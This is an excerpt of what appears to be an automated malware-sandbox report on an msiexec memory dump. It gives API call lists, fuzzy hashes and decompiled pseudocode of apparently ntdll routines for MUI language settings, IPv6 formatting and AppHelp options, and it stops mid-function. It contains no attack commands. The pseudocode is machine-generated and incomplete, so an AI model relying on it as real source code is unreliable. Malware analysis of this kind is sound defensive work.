Snapshot File: hcaresult_8_2_90000_msiexec.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 636eb34337e7c344e61ad9b716489d8b53c43532a0902623b9219804138c3df3
Instruction ID: 60c62c4a7600a40bb746fefb0d481cd72070713fdaaaf42b1b9611d2fa2ff488
Opcode Fuzzy Hash: 636eb34337e7c344e61ad9b716489d8b53c43532a0902623b9219804138c3df3
Instruction Fuzzy Hash: E201D831A802187BEB20A6949C03FFE766C6B42B51F154158FF04BA2C3E6D56A0643E1

Uniqueness

Uniqueness Score: -1.00%

Function 000982F0, Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009836B

Memory Dump Source

Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_90000_msiexec.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
Instruction ID: 3775376ca223d4126c1e209ca1cea65bf9cf806267cfabef4fb3205a5dd7ece0
Opcode Fuzzy Hash: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
Instruction Fuzzy Hash: 6C01A731A802287BEB20A6989C03FFE776C6B42F50F054118FF04BA1C2EAD46A0547F6

Uniqueness

Uniqueness Score: -1.00%

Function 000AA231, Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0009F192,0009F192,?,00000000,?,?), ref: 000AA1F0

Memory Dump Source

Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_90000_msiexec.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 5a03e0d439bc587cf6d8f2d6a1aae73b66b7442a0b6c74102f1669eef416251d
Instruction ID: bf1dd09a43e006f7e37da9095fe59361ff0b1b61eb038178dbb992cf97dd2e12
Opcode Fuzzy Hash: 5a03e0d439bc587cf6d8f2d6a1aae73b66b7442a0b6c74102f1669eef416251d
Instruction Fuzzy Hash: 0911C8756042846FDB15EFB8DC91CDBBBA8DF43220B148989F8D847243C631E515CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 000AA0D0, Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000AA124

Memory Dump Source

Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_90000_msiexec.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 1fa6533dc855de3041092aaa7ae1c9f909dd1f67f5c247ea3862a3c5d2809244
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 1101B2B2210108BFCB54DF89DC81EEB77ADAF8C754F158258FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 000AA1B1, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0009F192,0009F192,?,00000000,?,?), ref: 000AA1F0

Memory Dump Source

Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_90000_msiexec.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 0efb2b171b6206de05d9c5f2caa03bcfc09fc4014dc36b083393782b0a22da9d
Instruction ID: a7f68e833e32ec2be5f437396f2234ac5aaa1eebf11e4500e4aeec95ffb8291a
Opcode Fuzzy Hash: 0efb2b171b6206de05d9c5f2caa03bcfc09fc4014dc36b083393782b0a22da9d
Instruction Fuzzy Hash: BBF0E5B82042952BD711DF71D844ED33FA9DF42350F14419DF8991B143C134A41ACBB1

Uniqueness

Uniqueness Score: -1.00%

Function 000AA1C0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0009F192,0009F192,?,00000000,?,?), ref: 000AA1F0

Memory Dump Source

Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_90000_msiexec.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 949f3d6754956acb4fb864f5626736197b2e15330137ffa63834fc1f1bbedb33
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: D7E01AB16002086BDB10DF89CC85EE737ADAF89650F018154BA0C57242CA30E8148BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0009F690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00098CF4,?), ref: 0009F6BB

Memory Dump Source

Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_90000_msiexec.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: 304b0250302ecd0ffa133cd0a1909b83658c2d3a4caa3817826ae4284b78d623
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: 35D0A9767903083BFA10FAE89C03F6632CCAB95B00F490074FA48EB3C3EAA0F4008165

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02738788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E02738788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02738460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0271E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0273718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02738460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0273718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02738460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02738460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02738460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0273718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0271E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02712340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0272E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0271E2A8(_t322,  &_v68, _v16);
								if(E02735553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0272E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0271E2A8(_t322,  &_v68, _t236);
								if(E02735553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0273718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0271E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02712340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0272E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0271E2A8(_v12,  &_v68, _v16);
							if(E02735553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0272E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0271E2A8(_t322,  &_v68, _t269);
							if(E02735553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0273718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0271E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02712340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0272E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0271E2A8(_v12,  &_v68, _v16);
						if(E02735553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0272E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0271E2A8(_t322,  &_v68, _t296);
						if(E02735553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0271E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x02738788
0x02738788
0x02738791
0x02738794
0x02738798
0x0273879b
0x0273879e
0x027387a1
0x027387a4
0x027387a7
0x027387aa
0x027387af
0x02781ad3
0x02738b0a
0x02738b0d
0x02738b13
0x02738b19
0x02738b1f
0x02738b25
0x02738b2b
0x02738b31
0x02738b37
0x02738b3d
0x02738b46
0x02738b46
0x027387c6
0x027387d0
0x02781ae0
0x02781ae6
0x02781af8
0x02781af8
0x02781afd
0x02781afe
0x02781b01
0x02781b06
0x02781b06
0x027387d6
0x027387f2
0x027387f7
0x02738807
0x0273880a
0x0273880f
0x02738810
0x02738813
0x02738818
0x02738818
0x0273882c
0x02738831
0x02738838
0x02738908
0x02738920
0x027389f0
0x02738a08
0x02738af6
0x02738af6
0x02738af8
0x02738afb
0x02781beb
0x02781beb
0x02738b04
0x02781bf8
0x02781c0e
0x02781c13
0x02781c16
0x02781c16
0x02781bf8
0x00000000
0x02738b04
0x02738a0e
0x02738a11
0x02738a14
0x02738a15
0x02738a18
0x02738a22
0x02738b59
0x02738a28
0x02738a3c
0x02738a3c
0x02738a42
0x02781bb0
0x02781b11
0x02781b11
0x00000000
0x02738a48
0x02738a51
0x02738a5b
0x02738a5e
0x02738a61
0x02738a69
0x02738a69
0x02738a6d
0x00000000
0x00000000
0x02738a74
0x02738a7c
0x02738a7d
0x02738a91
0x02738a93
0x02738a93
0x02738a98
0x02738a9b
0x02738aa1
0x02738aa1
0x02738aa4
0x02738aaa
0x02738ab1
0x02738ac5
0x02738ac7
0x02738ac7
0x02738ac5
0x02738ace
0x02781bc9
0x02781bce
0x02781bd2
0x02781bd2
0x02738ad8
0x02738aeb
0x02738aeb
0x02738af0
0x02738af4
0x00000000
0x02738af4
0x02738a42
0x02738926
0x02738929
0x0273892c
0x0273892d
0x02738930
0x02738935
0x0273893a
0x02738b51
0x02738940
0x02738954
0x02738954
0x0273895a
0x02781b63
0x00000000
0x02738960
0x02738969
0x02738973
0x02738976
0x02738979
0x0273897e
0x02738981
0x02738981
0x02738986
0x00000000
0x00000000
0x02781b6e
0x02781b74
0x02781b7b
0x02781b8f
0x02781b91
0x02781b91
0x02781b99
0x02781b9c
0x02781ba2
0x02781ba2
0x0273898c
0x02738992
0x02738999
0x027389ad
0x02781ba8
0x02781ba8
0x027389ad
0x027389b6
0x027389c8
0x027389cd
0x027389d0
0x027389d0
0x027389d6
0x027389e8
0x027389e8
0x027389ed
0x00000000
0x027389ed
0x0273895a
0x0273883e
0x02738841
0x02738844
0x02738845
0x02738848
0x0273884d
0x02738852
0x02738b49
0x02738858
0x0273886c
0x0273886c
0x02738872
0x02781b0e
0x00000000
0x02738878
0x02738881
0x0273888b
0x0273888e
0x02738891
0x02738896
0x02738899
0x02738899
0x0273889e
0x00000000
0x00000000
0x02781b21
0x02781b27
0x02781b2e
0x02781b42
0x02781b44
0x02781b44
0x02781b4c
0x02781b4f
0x02781b55
0x02781b55
0x027388a4
0x027388aa
0x027388b1
0x027388c5
0x02781b5b
0x02781b5b
0x027388c5
0x027388ce
0x027388e0
0x027388e5
0x027388e8
0x027388e8
0x027388ee
0x02738900
0x02738900
0x02738905
0x00000000
0x02738905

APIs

_wcspbrk.LIBCMT ref: 02738891
_wcspbrk.LIBCMT ref: 02738979
_wcspbrk.LIBCMT ref: 02738A61
_wcspbrk.LIBCMT ref: 02738A9B
_wcspbrk.LIBCMT ref: 02781B9C

Strings

Kernel-MUI-Language-Allowed, xrefs: 02738827
Kernel-MUI-Language-SKU, xrefs: 027389FC
WindowsExcludedProcs, xrefs: 027387C1
Kernel-MUI-Language-Disallowed, xrefs: 02738914
Kernel-MUI-Number-Allowed, xrefs: 027387E6

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: 2c4a5db121e64d99e2db506aa9daf3556de656b789161f5ad3b4fc2a13f28e73
Instruction ID: b9ca55ac6306de3dee3598ba66eee94cca12b4be223d7d8681085b4fcd804e91
Opcode Fuzzy Hash: 2c4a5db121e64d99e2db506aa9daf3556de656b789161f5ad3b4fc2a13f28e73
Instruction Fuzzy Hash: 65F1D7B2D00209EFCF12EF99C9849EEBBB9FF08304F14446AE505A7211E735AA45DF61

Uniqueness

Uniqueness Score: -1.00%

Function 027513CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E027513CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02747707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2712926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02747707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2719cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02747707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02747707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02747707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02747707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x027513d5
0x027513d9
0x027513dc
0x027513de
0x027513e1
0x027513e8
0x027513ee
0x0277e8fd
0x00000000
0x0277e921
0x0277e921
0x0277e928
0x0277e982
0x0277e98a
0x00000000
0x0277e99a
0x0277e99e
0x0277e9a3
0x0277e9a8
0x0277e9b9
0x0277e978
0x00000000
0x0277e978
0x0277e98a
0x0277e92a
0x0277e931
0x0277e944
0x0277e944
0x0277e950
0x0277e954
0x0277e959
0x0277e95e
0x0277e963
0x0277e970
0x00000000
0x0277e975
0x0277e93b
0x0277e980
0x00000000
0x0277e980
0x0277e942
0x0277e94b
0x00000000
0x0277e94b
0x00000000
0x0277e942
0x027513f4
0x027513f4
0x027513f9
0x027513fc
0x027513ff
0x02751406
0x0277e9cc
0x0277e9d2
0x0277e9d2
0x0277e9cc
0x0275140c
0x02751411
0x02751431
0x0275143a
0x0275143c
0x0275143f
0x0275143f
0x02751442
0x02751447
0x027514a8
0x027514ac
0x0277e9e2
0x0277e9e7
0x0277e9ec
0x0277ea05
0x0277ea05
0x00000000
0x02751449
0x00000000
0x02751449
0x0275144c
0x02751459
0x02751462
0x02751469
0x0275146a
0x02751470
0x02751473
0x02751476
0x02751476
0x02751490
0x02751495
0x0275138e
0x02751390
0x02751397
0x02751398
0x02751399
0x027513a1
0x027513a4
0x027513a4
0x02751498
0x0275149c
0x0275149f
0x027514a2
0x00000000
0x00000000
0x027514a4
0x00000000
0x027514a4
0x02751413
0x02751415
0x02751416
0x02751419
0x0275141c
0x02751422
0x027513b7
0x027513bc
0x027513bf
0x027513bf
0x027513c2
0x02751424
0x02751424
0x02751424
0x02751427
0x0275142b
0x0275142c
0x0275142c
0x0275142c
0x00000000
0x0275141c
0x02751411

APIs

___swprintf_l.LIBCMT ref: 0275146B
___swprintf_l.LIBCMT ref: 02751490
___swprintf_l.LIBCMT ref: 0277E970

Strings

::%hs%u.%u.%u.%u, xrefs: 0277E967
::ffff:0:%u.%u.%u.%u, xrefs: 0277E9B0
ffff:, xrefs: 0277E94B
:%u.%u.%u.%u, xrefs: 0277E9F4

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 245c1b1f2a73fc75af8710e321fa2df9368ca294bd7d937819c66727780be433
Instruction ID: 0b0bc5bf0b9079486c4df87f8a2b88706f4c99afedd7b76b4847e2f44d89de99
Opcode Fuzzy Hash: 245c1b1f2a73fc75af8710e321fa2df9368ca294bd7d937819c66727780be433
Instruction Fuzzy Hash: 3B6136B1D00665EACF25CF59C890ABFFBB6EF84302B84C06DE9DA47540D7B4A640CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02747EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E02747EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x27f2088; // 0x766d5afb
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02747F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02763F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0271DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x27f4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02763F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02720D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02763F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
